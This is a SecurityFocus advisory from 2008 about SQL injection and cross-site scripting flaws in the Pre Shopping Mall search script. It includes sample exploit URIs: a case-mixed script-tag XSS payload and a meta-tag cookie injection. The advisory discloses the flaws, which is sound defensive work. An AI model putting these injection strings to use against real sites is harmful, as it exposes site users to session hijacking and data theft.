Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Pre Shopping Mall SQL Injection and Cross Site Scripting Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/[Path]/search.php?search=[SQL]&submit=Search
http://www.example.com/[Path]/search.php?search=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=Search
http://www.example.com/[Path]/emall/search.php?search=111-222-1933Pouya@yahoo.com&skip=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>







 

Privacy Statement
Copyright 2008, SecurityFocus